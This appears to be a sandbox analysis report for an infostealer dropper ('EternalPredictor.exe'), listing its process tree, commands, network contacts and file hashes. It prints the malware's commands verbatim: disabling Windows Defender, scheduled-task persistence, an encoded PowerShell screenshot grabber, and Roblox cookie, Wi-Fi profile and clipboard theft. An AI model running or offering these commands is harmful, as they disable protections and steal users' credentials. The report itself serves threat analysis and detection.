PID 4544 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\attrib.exe
PID 4544 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\attrib.exe
PID 4544 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 2644 wrote to memory of 4440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2644 wrote to memory of 4440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2160 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2160 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2972 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2972 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4692 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4692 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 4668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3424 wrote to memory of 4668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4796 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4796 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4128 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4128 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 2668 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

C:\Users\Admin\AppData\Roaming\eternal.exe

"C:\Users\Admin\AppData\Roaming\eternal.exe"

C:\Users\Admin\AppData\Roaming\skuld.exe

"C:\Users\Admin\AppData\Roaming\skuld.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\system32\attrib.exe

attrib +h +s C:\Users\Admin\AppData\Roaming\skuld.exe

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s1nf3keq\s1nf3keq.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB65F.tmp" "c:\Users\Admin\AppData\Local\Temp\s1nf3keq\CSCACB1B33F42B34ED4BD7F3B32DB16E06.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\DicYJ.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI32882\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI32882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\DicYJ.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 147.185.221.23:33942 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp

Files

memory/2736-0-0x00007FFDFDB20000-0x00007FFDFDBBE000-memory.dmp

memory/2736-1-0x00000000002D0000-0x0000000001466000-memory.dmp

C:\Users\Admin\AppData\Roaming\eternal.exe

MD5 7439cc991a9a756c41153b8e9121baab
SHA1 c62528386e5f62ff2975cc8ed0cad3a7d362e632
SHA256 31a2b821e933bb193d94438d4a5aa036519535336c936d65b66889fb03164e2d
SHA512 cbdfd77671884407f8f4bd9c5251df5d8896b29bd004ea52460eda8a222df7492c69572e044376315624220f3ea66de3aff34323ea281591ca2975f90fa6dd51

memory/4568-13-0x00007FFDFDB20000-0x00007FFDFDBBE000-memory.dmp

memory/4568-14-0x0000000000A60000-0x0000000000A78000-memory.dmp

C:\Users\Admin\AppData\Roaming\skuld.exe

MD5 dbbd2127d1030e4c9548fdf7de9983a7
SHA1 5b7939a94cbd908ad8f57bb2e5328cce657c3700
SHA256 8e3601302c0294914808b6537cd27de961d087ba0807590b981b7f8c8aa5eee6
SHA512 95a1112c9b062745df9c20f566cfcb9421221111d02db0c1a940a5ea230b09c39a487685ae674c350e4641132e3360a19ca0cd8762f7e46cecde8b7dd85fe5d2

C:\Users\Admin\AppData\Roaming\program.exe

MD5 3e6865657b29faea3a355c710f0aad45
SHA1 ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
SHA256 2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
SHA512 b360b5a244e83ee95719d7e781b9a49a29a5251e936619786b0151d0992aee33746109b3a8b0ab8d18c2788b738892c9b296c8c601025e16d850d730837b1615

memory/2736-39-0x00007FFDFDB20000-0x00007FFDFDBBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI32882\python313.dll

MD5 6ef5d2f77064df6f2f47af7ee4d44f0f
SHA1 0003946454b107874aa31839d41edcda1c77b0af
SHA256 ab7c640f044d2eb7f4f0a4dfe5e719dfd9e5fcd769943233f5cece436870e367
SHA512 1662cc02635d63b8114b41d11ec30a2af4b0b60209196aac937c2a608588fee47c6e93163ea6bf958246c32759ac5c82a712ea3d690e796e2070ac0ff9104266

C:\Users\Admin\AppData\Local\Temp\_MEI32882\VCRUNTIME140.dll

